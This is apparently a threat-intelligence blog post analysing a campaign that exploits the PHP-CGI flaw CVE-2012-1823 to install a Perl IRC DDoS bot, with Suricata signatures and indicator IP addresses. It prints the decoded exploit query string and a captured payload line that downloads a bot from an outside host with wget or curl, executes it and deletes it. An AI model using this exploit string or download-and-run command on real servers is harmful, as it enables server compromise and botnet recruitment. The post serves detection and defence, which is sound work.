Attempts to gain control of public facing web servers with modified HTTP requests are very common, and can sometimes pose a danger to unpatched systems. With the use of publicly available tooling, these web crawling and attack attempts are extremely easy to perform and are often considered the realm of ‘script-kiddies’. While the likelihood of such an attack being successful is low, an analyst should know how to approach and understand these basic attacks. Many large compromises have come from older vulnerabilities, so they should not be ignored based on age alone.
In this post, I wanted to share a few examples of a DDoS Perl IrcBot we’ve observed - a campaign of attacks similar to the more common Shellbot. In this attack, the attacker crawls the internet looking for public facing web servers, and makes a specially crafted HTTP POST request to each one it finds. These attacks are opportunistic in nature, aiming to catch the lowest hanging fruit across the internet.
Figure 1. Example malicious HTTP POST
As shown in figure 1, the POST request contains the large URL encoded string:
The URL encoding is likely an effort to evade basic detection capabilities. The decoded string is as follows:
cgi-bin/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -d auto_prepend_file=php://input -n
Inspecting some of the instructions will help provide a better idea of what the attacker is attempting to accomplish:
- cgi-bin/php? - Use the php interpreter in the cgi-bin directory
- allow_url_include=on - Allows data retrieval from remote locations
- safe_mode=off - Disables PHP safe mode settings.
- suhosin.simulation=on - Disables suhosin PHP protection, but keeps logging.
- disable_functions="" - Removes any disabled functions already set.
- open_basedir=none - Sets no limits on files that can be opened by PHP
As you may have noticed, this technique is not new; it has been used continuously since the release of CVE-2012-1823, which allows remote attackers to execute arbitrary code by placing command-line options in the query string.
The content of the HTTP POST contains the actual file download instruction:
<? system("cd /tmp ; wget http://126.96.36.199/zmuie ; curl -O http://188.8.131.52/zmuie; fetch http://184.108.40.206/zmuie ; chmod +x zmuie ; ./zmuie ; perl zmuie ; rm -rf zmuie "); ?>
All of the file downloads we’ve observed have been versions of DDoS Perl IrcBot v1.0 / 2017, which is a reused piece of code from 2013. The attackers simply modified small sections of the file in order to change the authorship and the IRC configurations. The most recent attacks have used multiple older versions of the code. For example, the below screenshot shows code that originated in 2013 being used over the past few months:
Figure 2. Example of 2013 code in recent attacks.
One of the more recent attempts used a bot configuration file with the Flood.ro Team name.
Figure 3. Example code showing Flood.ro Team name.
There are many variations of these files (some shown below) that claim to be authored by different groups, including vK Security Team and aloha Security Team. In all of these files, the code contains instructions for inexperienced attackers to work off of and clear indicators of authorship, suggesting that the teams are using these files to increase their reputation as malware authors. Based on attack timing across multiple web scans at large scale, I assess with medium confidence that all of these “teams” are a single entity.
Figure 4. Exploit attempt using cs titled file.
Figure 5. First 54 lines of malicious file.
Between the varying inbound exploit attempts, the attacker experimented with alternative file names, noting the no-extension extention below:
Figure 6. Inbound exploit attempt using zmuie.noext file.
Figure 7. First 47 lines of malicious zmuie.noext file.
More recently, the attacker figured out that an extension is not really necessary..
Figure 8. Inbound exploit attempt using zmuie file.
Figure 9. First 47 lines of malicious zmuie file.
It's worth noting that these infection attempts have had fairly limited success rates. Once a host is successfully exploited and joins the IRC botnet, it can be controlled by the attacker. Noted in the above screenshots, DDoS, port scanning, downloading, and flooding are all built in capabilities that the victim can perform for the attacker. In the botnets we’ve monitored, typically around 200 hosts are members of the botnet at any one time.
Defending against this exploit attempt is as simple as updating PHP. Check out the original NIST CVE post for specifics: nvd.nist.gov/vuln/detail/CVE-2012-1823
There are a number of command line and GUI tools available to decode URL encoded strings. For analysts unsure of how to do this, I recommend checking out CyberChef from GCHQ. Download that locally on your machine, and add it to your browser favorites for easy access. URL decoding is just one capability of the tool, so be sure to check out its other helpful features.
Detection and Indicators:
If you would like to automate the intake of these detections, please see our GitHub Detections repo.
Suricata IDS signature:
- alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"401TRG Generic Webshell Request - POST with wget in body"; flow:established,to_server; content:"wget"; nocase; http_client_body; content:"http"; nocase; http_client_body; within:11; threshold:type limit, track by_src, seconds 3600, count 1; classtype:web-application-attack; sid:600052; rev:1;)
- alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"401TRG Perl DDoS IRCBot File Download"; flow:established,from_server; content:"|6d 79 20 24 70 72 6f 63 65 73 73 20 3d 20 24 72 70 73 5b 72 61 6e 64 20 73 63 61 6c 61 72 20 40 72 70 73 5d 3b|"; sid:600051; rev:1;)
- 220.127.116.11 - IRC Server
- 18.104.22.168 - IRC Server (only.god[.]jp)
- 22.214.171.124 - Malware Drop Location
- 126.96.36.199 - Malware Drop Location
- 188.8.131.52 - Malware Drop Location
- 184.108.40.206 - Malware Drop Location (idip.do[.]am)